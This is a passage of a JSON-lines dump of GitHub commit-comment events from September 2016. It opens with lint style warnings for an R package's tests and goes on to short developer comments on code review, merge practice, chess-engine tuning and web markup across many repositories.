child.7.10\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_print.R:139:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_print.R#L139) *style:* **lines should not be more than 120 characters.**\n```r\n​  expect_identical(res, \"0 : parent1 --> 1 : child.1\\n            |-> 2 : child.2\\n            \\\\-> 3 : child.3 --> 4 : child.3.4\\n                            |-> 5 : child.3.5\\n                            |-> 6 : child.3.6\\n                            \\\\-> 7 : child.3.7 --> 8 : child.7.8\\n                                              |-> 9 : child.7.9\\n                                              \\\\-> 10 : child.7.10\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_SearchTree.R:15:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_SearchTree.R#L15) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_treeDepth.R:92:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_treeDepth.R#L92) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_treeDepth.R:93:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_treeDepth.R#L93) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_treeWalker.R:206:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_treeWalker.R#L206) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_treeWalker.R:207:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_treeWalker.R#L207) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-25T23:39:09Z"}
{"id":"4615152196","type":"CommitCommentEvent","actor":{"login":"andrewarrow"},"repo":{"name":"andrewarrow/paradise_ftp"},"payload":{"comment":{"id":19165992,"position":null,"line":null,"path":null,"commit_id":"93f9ce78463f8f77220506019b5b761580a5e607","created_at":"2016-09-25T23:39:31Z","updated_at":"2016-09-25T23:39:31Z","body":"oh i see. cool. nice!"}},"created_at":"2016-09-25T23:39:31Z"}
{"id":"4615154570","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19165996,"position":null,"line":null,"path":null,"commit_id":"c53b3a0c1c492984c985ded660d8bad827c7948d","created_at":"2016-09-25T23:41:20Z","updated_at":"2016-09-25T23:41:20Z","body":"@valib When working this way it must be possible to make small \"misc fixes\" PRs. As long as the fixes are explained there shouldn't be much of a problem to get them reviewed. What I think is hard to review is things I don't understand why is done, so for me a little explanation goes a long way.\r\n\r\nI really hate reverting and although it must be done some times, I think that should only be a last resort. Reverting creates a messy history that is difficult to understand because there's often other commits between the \"original\" commit and the revert commit. I've tried to \"trace\" many things in UMS to understand why something is done the way it is, and the history is really hard to follow because there has been a lot of \"unnecessary\" merges and reverts. When I work \"in my own branch\" I rebase/reset instead of revert, but that is no good to do in master as everyone will have to reset their local copy afterwards. I think it's much better to take a little time to make sure before merging than to have to do a lot of \"corrections\" after the fact.\r\n\r\nGive PRs that you think is good to merge and lack attention a bit explanation if necessary - that doubles as a bump to get some attention too."}},"created_at":"2016-09-25T23:41:20Z"}
{"id":"4615154804","type":"CommitCommentEvent","actor":{"login":"scottdickson86"},"repo":{"name":"scottdickson86/SD-SCN-IPC"},"payload":{"comment":{"id":19165997,"position":null,"line":null,"path":null,"commit_id":"c21e31eb4129caacbd49e59502d9cade9e1271c6","created_at":"2016-09-25T23:41:32Z","updated_at":"2016-09-25T23:41:32Z","body":"Generic .gitignore for Python repos"}},"created_at":"2016-09-25T23:41:32Z"}
{"id":"4615154853","type":"CommitCommentEvent","actor":{"login":"aa65535"},"repo":{"name":"pexcn/SimpleUtils"},"payload":{"comment":{"id":19165998,"position":null,"line":null,"path":null,"commit_id":"0cf0083bf25e5284dfc4b66f6f8e1ed74e2553a9","created_at":"2016-09-25T23:41:35Z","updated_at":"2016-09-25T23:41:35Z","body":"@pexcn 会, 如果真想引用一个 Context 对象的话也不要去引用 Activity 对象, 可以使用 `getApplicationContext(), getApplication()` 这两个方法返回的 Context 对象.\r\n\r\n"}},"created_at":"2016-09-25T23:41:35Z"}
{"id":"4615155550","type":"CommitCommentEvent","actor":{"login":"freiheit"},"repo":{"name":"HearthSim/discord_rss_bot"},"payload":{"comment":{"id":19166000,"position":null,"line":null,"path":null,"commit_id":"dc86fd1fcb3a866c18b423268ceb7e352f2a553b","created_at":"2016-09-25T23:42:06Z","updated_at":"2016-09-25T23:42:06Z","body":"Python style guides indicate that spaces are preferred over tabs.\r\n\r\nhttps://www.python.org/dev/peps/pep-0008/#id18"}},"created_at":"2016-09-25T23:42:06Z"}
{"id":"4615156016","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19166001,"position":null,"line":null,"path":null,"commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-25T23:42:27Z","updated_at":"2016-09-25T23:42:27Z","body":"Hey @joakimk. We thought long and hard about this one. We considered a couple of other options like delaying and prioritizing the jobs but realized that none of them would solve our problem.\r\n\r\nBasically we're dealing with a situation where some jobs need to be suspended while waiting for others to finish. At first glance this sounded like prioritization, but upon closer inspection job priorities have a big hole (at least in our case): high priority jobs may arrive late, in which case the low-priority ones would be executed and subsequently corrupt the data. In other words, the order in which the jobs are executed is key.\r\n\r\nNow that we've established the fact that order is important, we considered having a simple worker property that tells `toniq` that MyProject.WorkerA and MyProject.WorkerB are suspended while MyProject.WorkerC isn't. Unfortunately, this delineation isn't sufficient. In our case, we want to be able to say some instances of WorkerA and B should be suspended while others should be executed. \r\n\r\nSo this is the rough workflow of how things work in our application.\r\n\r\n1. A global switch is turned ON indicating some jobs are to be suspended.\r\n2. For every new job that we receive, we call `Toniq.suspend_to/2`.\r\n3. The global switch is turned OFF indicating the suspended jobs may not proceed.\r\n4. We call `Toniq.JobPersistence.move_suspended_job_to_incoming_jobs(job)` for every suspended job.\r\n\r\nI'm not entirely happy with the naming, e.g. `suspend_to` and the API, but I'm open to suggestions.\r\n\r\nLet me know if I haven't explained the solution clearly enough or if you can think of a better one."}},"created_at":"2016-09-25T23:42:27Z"}
{"id":"4615158841","type":"CommitCommentEvent","actor":{"login":"bjourne"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19166008,"position":null,"line":null,"path":null,"commit_id":"e32e45e59062ba4c9c75415c11ed81f069d8302f","created_at":"2016-09-25T23:44:47Z","updated_at":"2016-09-25T23:44:47Z","body":"I didn't think of that. :) But that is better yes. "}},"created_at":"2016-09-25T23:44:47Z"}
{"id":"4615162707","type":"CommitCommentEvent","actor":{"login":"cgerke"},"repo":{"name":"facebook/IT-CPE"},"payload":{"comment":{"id":19166017,"position":null,"line":null,"path":null,"commit_id":"cfb8099379fa6d95515f95a1586ff258f5ed2339","created_at":"2016-09-25T23:47:43Z","updated_at":"2016-09-25T23:47:43Z","body":"Is this commit missing the cpe_init dependencies on purpose?"}},"created_at":"2016-09-25T23:47:43Z"}
{"id":"4615164382","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19166021,"position":null,"line":null,"path":null,"commit_id":"19985a667b6c39b57cce38ebaf51a5bcfc838a78","created_at":"2016-09-25T23:48:58Z","updated_at":"2016-09-25T23:48:58Z","body":"I would simply replace line 749 of current master \r\n                sf = more_than_one(pos.pieces(PAWN)) ? ScaleFactor(31) : ScaleFactor(9);\r\nwith\r\n{\r\n                double factor =1.0 - pos.rule50_count()/100.0;\r\n                sf = more_than_one(pos.pieces(PAWN)) ? ScaleFactor(31 * factor) : ScaleFactor(9 * factor);\r\n}\r\n\r\nor something dropping even more quickly. For example\r\n double factor =std::max(1.0 - pos.rule50_count()/50.0 , 0);\r\n\r\n\r\n"}},"created_at":"2016-09-25T23:48:58Z"}
{"id":"4615164430","type":"CommitCommentEvent","actor":{"login":"Uppermost"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":19166022,"position":null,"line":null,"path":null,"commit_id":"329620d22baa04490f76ca21b0138a43e59cb489","created_at":"2016-09-25T23:49:00Z","updated_at":"2016-09-25T23:49:00Z","body":"On official only you receive they information not all player. Now should be fix"}},"created_at":"2016-09-25T23:49:00Z"}
{"id":"4615166097","type":"CommitCommentEvent","actor":{"login":"siw-touch"},"repo":{"name":"siw-touch/touch"},"payload":{"comment":{"id":19166028,"position":null,"line":null,"path":null,"commit_id":"1e407fbd157e839408882eb8ce1fe2cd5be44460","created_at":"2016-09-25T23:50:17Z","updated_at":"2016-09-25T23:50:17Z","body":"This patch is required for the next patch:\r\nhttps://github.com/siw-touch/touch/commit/139fd41d85050d68fd15b26fc03fc21fd3329a61\r\n"}},"created_at":"2016-09-25T23:50:17Z"}
{"id":"4615166138","type":"CommitCommentEvent","actor":{"login":"mrjbq7"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19166029,"position":null,"line":null,"path":null,"commit_id":"e32e45e59062ba4c9c75415c11ed81f069d8302f","created_at":"2016-09-25T23:50:19Z","updated_at":"2016-09-25T23:50:19Z","body":"Thats what I did for ``tools.test``, so you can just ``./factor -run=tools.test vocab1 vocab2``:\r\n\r\nhttps://github.com/factor/factor/blob/master/basis/tools/test/test.factor#L188"}},"created_at":"2016-09-25T23:50:19Z"}
{"id":"4615166999","type":"CommitCommentEvent","actor":{"login":"siw-touch"},"repo":{"name":"siw-touch/touch"},"payload":{"comment":{"id":19166031,"position":null,"line":null,"path":null,"commit_id":"139fd41d85050d68fd15b26fc03fc21fd3329a61","created_at":"2016-09-25T23:50:56Z","updated_at":"2016-09-25T23:50:56Z","body":"This patch requires the previous patch:\r\nhttps://github.com/siw-touch/touch/commit/1e407fbd157e839408882eb8ce1fe2cd5be44460\r\n"}},"created_at":"2016-09-25T23:50:56Z"}
{"id":"4615167474","type":"CommitCommentEvent","actor":{"login":"kann23"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19166035,"position":null,"line":null,"path":null,"commit_id":"19985a667b6c39b57cce38ebaf51a5bcfc838a78","created_at":"2016-09-25T23:51:19Z","updated_at":"2016-09-25T23:51:19Z","body":"Thanks!"}},"created_at":"2016-09-25T23:51:19Z"}
{"id":"4615168914","type":"CommitCommentEvent","actor":{"login":"siw-touch"},"repo":{"name":"siw-touch/touch"},"payload":{"comment":{"id":19166047,"position":null,"line":null,"path":null,"commit_id":"9264ea3f3e70eb91ef4bd5137926475f19f9dfff","created_at":"2016-09-25T23:52:22Z","updated_at":"2016-09-25T23:52:22Z","body":"This patch is the last stage of the previous patch:\r\nhttps://github.com/siw-touch/touch/commit/139fd41d85050d68fd15b26fc03fc21fd3329a61\r\n"}},"created_at":"2016-09-25T23:52:22Z"}
{"id":"4615169221","type":"CommitCommentEvent","actor":{"login":"t9md"},"repo":{"name":"t9md/atom-vim-mode-plus"},"payload":{"comment":{"id":19166049,"position":4,"line":108,"path":"lib/operator.coffee","commit_id":"eb0bf450b0f607b27cb1a5d6e4d6396924ba3bcd","created_at":"2016-09-25T23:52:36Z","updated_at":"2016-09-25T23:52:36Z","body":"was NOT pre-set"}},"created_at":"2016-09-25T23:52:36Z"}
{"id":"4615171151","type":"CommitCommentEvent","actor":{"login":"valib"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19166057,"position":null,"line":null,"path":null,"commit_id":"c53b3a0c1c492984c985ded660d8bad827c7948d","created_at":"2016-09-25T23:54:10Z","updated_at":"2016-09-25T23:54:10Z","body":"@Nadahar I agree with you but when nobody is making at least comment to the PR it is hard to distinguish if the PR is OK or not."}},"created_at":"2016-09-25T23:54:10Z"}
{"id":"4615171349","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19166060,"position":null,"line":null,"path":null,"commit_id":"daa8cf4608a89b5e1ae0dfbd8a553cadb7f43d49","created_at":"2016-09-25T23:54:22Z","updated_at":"2016-09-25T23:54:22Z","body":"![](http://ipic.su/anUuB.png)"}},"created_at":"2016-09-25T23:54:22Z"}
{"id":"4615172848","type":"CommitCommentEvent","actor":{"login":"laurence-myers"},"repo":{"name":"ltnetwork/node-ffmpeg-installer"},"payload":{"comment":{"id":19166067,"position":null,"line":null,"path":null,"commit_id":"3b23f6866fd19c18894368b4c09027a533a155cf","created_at":"2016-09-25T23:55:27Z","updated_at":"2016-09-25T23:55:27Z","body":"Hey thanks for making those changes! Now I can delete this fork :)"}},"created_at":"2016-09-25T23:55:27Z"}
{"id":"4615173694","type":"CommitCommentEvent","actor":{"login":"CaseyCarter"},"repo":{"name":"hsutter/gcpp"},"payload":{"comment":{"id":19166070,"position":50,"line":98,"path":"bitflags.h","commit_id":"a1902796acb51adf3ef7f91e9d7873c3562cbd65","created_at":"2016-09-25T23:56:06Z","updated_at":"2016-09-25T23:56:06Z","body":"This tests the trailing padding bits if `size % bits_per_unit != 0`. `set_all` writes the padding bits, so this gives the wrong answer if `set_all(true)` was called more recently than `set_all(false)`. (Note that the constructor uses `set_all` to initialize the bits, so a `bitflags` initialized to `true` has `true` padding bits.)\r\n\r\nThis could be \"easily\" corrected to:\r\n```c++\r\nauto test = [](unit u) { return u > unit(0); };\r\nreturn std::none_of(bits.get(), bits.get() + unit_count(size) - 1, test)\r\n    && test(*(bits.get() + unit_count(size) - 1) & (bit_mask(size) - 1));\r\n```\r\nalthough I'm beginning to wonder if it would be cleaner to require `size` to be a multiple of some largeish power of 2 (say 64) and require `bits_per_unit` to divide that number."}},"created_at":"2016-09-25T23:56:06Z"}
{"id":"4615174719","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"19smitgr/19smitgr.github.io"},"payload":{"comment":{"id":19166077,"position":null,"line":null,"path":null,"commit_id":"0938d2b2bc466877c39deac57cd4baaffcd67313","created_at":"2016-09-25T23:56:49Z","updated_at":"2016-09-25T23:56:49Z","body":"I only made the README.md today."}},"created_at":"2016-09-25T23:56:49Z"}
{"id":"4615174822","type":"CommitCommentEvent","actor":{"login":"Xelia"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":19166078,"position":null,"line":null,"path":null,"commit_id":"3b49a6316ecfa4ed29a038b0385207ff9c8b60c8","created_at":"2016-09-25T23:56:55Z","updated_at":"2016-09-25T23:56:55Z","body":"I tried rc7, and i feel that old timerFunc was much more responsive then new."}},"created_at":"2016-09-25T23:56:55Z"}
{"id":"4615175203","type":"CommitCommentEvent","actor":{"login":"Dine15"},"repo":{"name":"Dine15/imad-2016-app"},"payload":{"comment":{"id":19166081,"position":2,"line":0,"path":"ui/article-one.html","commit_id":"fa3157fbaa7119f92d497acfd3ab35747ac61c93","created_at":"2016-09-25T23:57:12Z","updated_at":"2016-09-25T23:57:12Z","body":"This is an attribute for making the web page to fit in the size of the screen. We don't need to zoom in and out "}},"created_at":"2016-09-25T23:57:12Z"}
{"id":"4613562366","type":"CommitCommentEvent","actor":{"login":"vincicao"},"repo":{"name":"vincicao/learnpythonTHW"},"payload":{"comment":{"id":19161877,"position":null,"line":null,"path":null,"commit_id":"e57e510a61c2ce4dae331c902e9b0cb17e3bc061","created_at":"2016-09-25T03:00:58Z","updated_at":"2016-09-25T03:00:58Z","body":"ex4"}},"created_at":"2016-09-25T03:00:58Z"}
{"id":"4613562555","type":"CommitCommentEvent","actor":{"login":"vincicao"},"repo":{"name":"vincicao/learnpythonTHW"},"payload":{"comment":{"id":19161879,"position":null,"line":null,"path":null,"commit_id":"e57e510a61c2ce4dae331c902e9b0cb17e3bc061","created_at":"2016-09-25T03:01:09Z","updated_at":"2016-09-25T03:01:09Z","body":"ex4 is ok"}},"created_at":"2016-09-25T03:01:09Z"}
{"id":"4613563144","type":"CommitCommentEvent","actor":{"login":"Ivan-Marquez"},"repo":{"name":"Ivan-Marquez/stylepoint"},"payload":{"comment":{"id":19161881,"position":6,"line":21,"path":"src/config/mongoose.js","commit_id":"ee9d94f9e7f1e2538fc0dd8d35b268b8cd16dedd","created_at":"2016-09-25T03:01:44Z","updated_at":"2016-09-25T03:01:44Z","body":"@kevinpr007 please elaborate. This is just a route / controller action mapping."}},"created_at":"2016-09-25T03:01:44Z"}
{"id":"4613564355","type":"CommitCommentEvent","actor":{"login":"Ivan-Marquez"},"repo":{"name":"Ivan-Marquez/stylepoint"},"payload":{"comment":{"id":19161886,"position":5,"line":6,"path":"src/routes/auth.routes.js","commit_id":"ee9d94f9e7f1e2538fc0dd8d35b268b8cd16dedd","created_at":"2016-09-25T03:03:00Z","updated_at":"2016-09-25T03:03:00Z","body":"@kevinpr007 please elaborate. This is just a route / controller action mapping. I would vote to keep things as simple as possible."}},"created_at":"2016-09-25T03:03:00Z"}
{"id":"4613566890","type":"CommitCommentEvent","actor":{"login":"beanstown106"},"repo":{"name":"PureNexusProject/android_frameworks_base"},"payload":{"comment":{"id":19161893,"position":null,"line":null,"path":null,"commit_id":"bd2170f926047fad148dfd7be8214cdc59f66249","created_at":"2016-09-25T03:05:30Z","updated_at":"2016-09-25T03:05:30Z","body":"Yep actually 7 works nice as well :) having a little trouble putting it into a traditional setting though instead of tunable"}},"created_at":"2016-09-25T03:05:30Z"}
{"id":"4613568868","type":"CommitCommentEvent","actor":{"login":"arvidn"},"repo":{"name":"arvidn/libtorrent"},"payload":{"comment":{"id":19161900,"position":5,"line":84,"path":"src/broadcast_socket.cpp","commit_id":"7a99d25b5f71fa2502b8ff2de3f03b83631d4b5b","created_at":"2016-09-25T03:07:30Z","updated_at":"2016-09-25T03:07:30Z","body":"yeah.. I thought I changed those, but I guess I didn't.."}},"created_at":"2016-09-25T03:07:30Z"}
{"id":"4613569207","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":19161903,"position":null,"line":null,"path":null,"commit_id":"54400856cf9819feaa2f3487683c37241c6f2e0e","created_at":"2016-09-25T03:07:55Z","updated_at":"2016-09-25T03:07:55Z","body":"The interrupt never actually trips (not yet) because no logic in the input handling for the DMG core sets the IF flag. Theoretically, it can still be tested now by manually editing memory via the debugger."}},"created_at":"2016-09-25T03:07:55Z"}
{"id":"4613569623","type":"CommitCommentEvent","actor":{"login":"PrajP"},"repo":{"name":"PrajP/MIDS-W205-PrajP"},"payload":{"comment":{"id":19161906,"position":null,"line":null,"path":null,"commit_id":"dcb4e87bdb9e094fcc1415abc85b359059cd430d","created_at":"2016-09-25T03:08:22Z","updated_at":"2016-09-25T03:08:22Z","body":"Lab-2 try"}},"created_at":"2016-09-25T03:08:22Z"}
{"id":"4613569657","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"PureNexusProject/android_frameworks_base"},"payload":{"comment":{"id":19161907,"position":null,"line":null,"path":null,"commit_id":"bd2170f926047fad148dfd7be8214cdc59f66249","created_at":"2016-09-25T03:08:24Z","updated_at":"2016-09-25T03:08:24Z","body":"Me too. SystemUI always crashed on me when trying to use 7, but I use a smaller DPI so that's probably why. Nice work on this one."}},"created_at":"2016-09-25T03:08:24Z"}
{"id":"4613573773","type":"CommitCommentEvent","actor":{"login":"jayjnu"},"repo":{"name":"blogTF/markup"},"payload":{"comment":{"id":19161925,"position":50,"line":50,"path":"detail.html","commit_id":"0b05c8e550421a0bacf54056c230ad854361960c","created_at":"2016-09-25T03:12:36Z","updated_at":"2016-09-25T03:12:36Z","body":"detail 이라는게 의미적으로 적절치 않아보임 main이라는게 더 맞을거같음\r\n"}},"created_at":"2016-09-25T03:12:36Z"}
{"id":"4613575294","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19161929,"position":null,"line":null,"path":null,"commit_id":"05ca22f0fc43d1c95db2baf5c0ba56d9b67b2c86","created_at":"2016-09-25T03:14:20Z","updated_at":"2016-09-25T03:14:20Z","body":"啥？为啥要去掉Timer？\r\n还有。。。这什么情况。。。\r\n😂 "}},"created_at":"2016-09-25T03:14:20Z"}
{"id":"4613578867","type":"CommitCommentEvent","actor":{"login":"zoehelen"},"repo":{"name":"zoehelen/writwithdigital"},"payload":{"comment":{"id":19161942,"position":null,"line":null,"path":null,"commit_id":"3d88313c6dcd0af97a878708c467ee3d051511cf","created_at":"2016-09-25T03:17:54Z","updated_at":"2016-09-25T03:17:54Z","body":"This is my first go at the site. It does have an attached CSS file but I couldn't find a place to update that/commit it, yet!"}},"created_at":"2016-09-25T03:17:54Z"}
{"id":"4613579817","type":"CommitCommentEvent","actor":{"login":"jayjnu"},"repo":{"name":"blogTF/markup"},"payload":{"comment":{"id":19161944,"position":17,"line":17,"path":"detail.html","commit_id":"0b05c8e550421a0bacf54056c230ad854361960c","created_at":"2016-09-25T03:18:56Z","updated_at":"2016-09-25T03:18:56Z","body":"직접 tag 엘리먼트를 잡지 않기"}},"created_at":"2016-09-25T03:18:56Z"}
{"id":"4613580234","type":"CommitCommentEvent","actor":{"login":"Collisionc"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":19161945,"position":null,"line":null,"path":null,"commit_id":"4fea1829d3b5aef46a77d356f38ca5e5704292ee","created_at":"2016-09-25T03:19:24Z","updated_at":"2016-09-25T03:19:24Z","body":"Also some minor things to possibly fix some crashes people are seeing on windows 7 gui builds. Didn't mean to commit it, but it doesn't hurt anything. "}},"created_at":"2016-09-25T03:19:24Z"}
{"id":"4613582915","type":"CommitCommentEvent","actor":{"login":"UnbendableStraw"},"repo":{"name":"Track44/mainsite"},"payload":{"comment":{"id":19161960,"position":null,"line":null,"path":null,"commit_id":"0d8047569ce1b5db732f2340b13fc1b18e203df3","created_at":"2016-09-25T03:22:19Z","updated_at":"2016-09-25T03:22:19Z","body":"Removed reddit link\r\nUpdated patreon link"}},"created_at":"2016-09-25T03:22:19Z"}
{"id":"4613582968","type":"CommitCommentEvent","actor":{"login":"jadestern"},"repo":{"name":"blogTF/markup"},"payload":{"comment":{"id":19161961,"position":11,"line":11,"path":"detail.html","commit_id":"0b05c8e550421a0bacf54056c230ad854361960c","created_at":"2016-09-25T03:22:24Z","updated_at":"2016-09-25T03:22:24Z","body":"css 파일로 외부 파일 작업"}},"created_at":"2016-09-25T03:22:24Z"}
{"id":"4613583241","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"netux79/myra1002"},"payload":{"comment":{"id":19161962,"position":null,"line":null,"path":null,"commit_id":"07d2dd532de6bd7d003fc3c6256344e2d0515e4f","created_at":"2016-09-25T03:22:41Z","updated_at":"2016-09-25T03:22:41Z","body":"Hi @netux79, hope you are well. Would you maybe like to look at the latest source version of RetroArch for the Wii? I am getting some reports that it crashes at startup, it would be great if you could look at it and we could fix it up so it works again."}},"created_at":"2016-09-25T03:22:41Z"}
{"id":"4613588935","type":"CommitCommentEvent","actor":{"login":"DoKWeB"},"repo":{"name":"DoKWeB/vk-music-downloader"},"payload":{"comment":{"id":19161988,"position":16,"line":16,"path":"frontend/vk.music.api-compiled.js","commit_id":"b16be1524a5f63d8b33f3046fa5af00dcbf8bae6","created_at":"2016-09-25T03:28:58Z","updated_at":"2016-09-25T03:28:58Z","body":"test"}},"created_at":"2016-09-25T03:28:58Z"}
{"id":"4613590574","type":"CommitCommentEvent","actor":{"login":"peepsnet"},"repo":{"name":"cyoung/stratux"},"payload":{"comment":{"id":19161991,"position":null,"line":null,"path":null,"commit_id":"e4916a9de6be7c29083a3a832120dddf11e06ec6","created_at":"2016-09-25T03:30:35Z","updated_at":"2016-09-25T03:30:35Z","body":"http://apple.stackexchange.com/questions/62870/how-do-i-tell-an-ios-device-theres-no-internet-connection-on-the-wifi"}},"created_at":"2016-09-25T03:30:35Z"}
{"id":"4613591790","type":"CommitCommentEvent","actor":{"login":"wegazi"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":19161996,"position":null,"line":null,"path":null,"commit_id":"387971be04f57f04e175ebaaa836f2947232bff2","created_at":"2016-09-25T03:31:51Z","updated_at":"2016-09-25T03:31:51Z","body":"Nice to hear that you solved it @genie 137 \r\n\r\nNice coding everybody. "}},"created_at":"2016-09-25T03:31:51Z"}
{"id":"4613594535","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19162002,"position":75,"line":1748,"path":"src/psl.c","commit_id":"1baaacccd5e1349f12c32f57e4a5e7098525415c","created_at":"2016-09-25T03:34:33Z","updated_at":"2016-09-25T03:34:33Z","body":"Don't we only need to do this `if (tmp == resbuf)`?"}},"created_at":"2016-09-25T03:34:33Z"}
{"id":"4613598239","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"SpongePowered/Ore"},"payload":{"comment":{"id":19162023,"position":4,"line":64,"path":"conf/application.conf.template","commit_id":"cee3e2082cbb3dac6a1d14f98d78d05931d48bf7","created_at":"2016-09-25T03:38:22Z","updated_at":"2016-09-25T03:38:22Z","body":"![oreo](https://lh4.ggpht.com/MKXzXpqSO9VnKgon2aDSEUuL86Z-wXKx63DkSlMZ8aH5C4c5oTau1P3Ls6u9TcvHkg=w300)"}},"created_at":"2016-09-25T03:38:22Z"}
{"id":"4613598907","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19162028,"position":null,"line":null,"path":null,"commit_id":"3367c4a6ef81d42be665dbc36177b75a937cf262","created_at":"2016-09-25T03:39:12Z","updated_at":"2016-09-25T03:39:12Z","body":"Yes, but it uses a callable"}},"created_at":"2016-09-25T03:39:12Z"}
{"id":"4613598949","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19162029,"position":null,"line":null,"path":null,"commit_id":"8f334d3ba66b87dd670752f850f4d14844b946cf","created_at":"2016-09-25T03:39:17Z","updated_at":"2016-09-25T03:39:17Z","body":"Sounds okay. Most of the big places are listed on FB and smaller ones are left out.\r\n\r\nCan you show some examples of returned objects."}},"created_at":"2016-09-25T03:39:17Z"}
{"id":"4613600551","type":"CommitCommentEvent","actor":{"login":"egpuckett"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19162036,"position":null,"line":null,"path":null,"commit_id":"55424de8ba87d85a2c21d211ac784f8541635014","created_at":"2016-09-25T03:40:57Z","updated_at":"2016-09-25T03:40:57Z","body":"@hlokavarapu Where is the parameter file that one uses to run this radial flow?"}},"created_at":"2016-09-25T03:40:57Z"}
{"id":"4613601259","type":"CommitCommentEvent","actor":{"login":"egpuckett"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19162041,"position":null,"line":null,"path":null,"commit_id":"55424de8ba87d85a2c21d211ac784f8541635014","created_at":"2016-09-25T03:41:44Z","updated_at":"2016-09-25T03:41:44Z","body":"@hlokavarapu Sorry, I can see it in the changes from 18 days ago."}},"created_at":"2016-09-25T03:41:44Z"}
{"id":"4613604418","type":"CommitCommentEvent","actor":{"login":"SEV007"},"repo":{"name":"SEV007/kappa"},"payload":{"comment":{"id":19162054,"position":null,"line":null,"path":null,"commit_id":"3093729239228c9bd8fe401a1e6e33610eca2464","created_at":"2016-09-25T03:45:11Z","updated_at":"2016-09-25T03:45:11Z","body":"remote tracking branck"}},"created_at":"2016-09-25T03:45:11Z"}
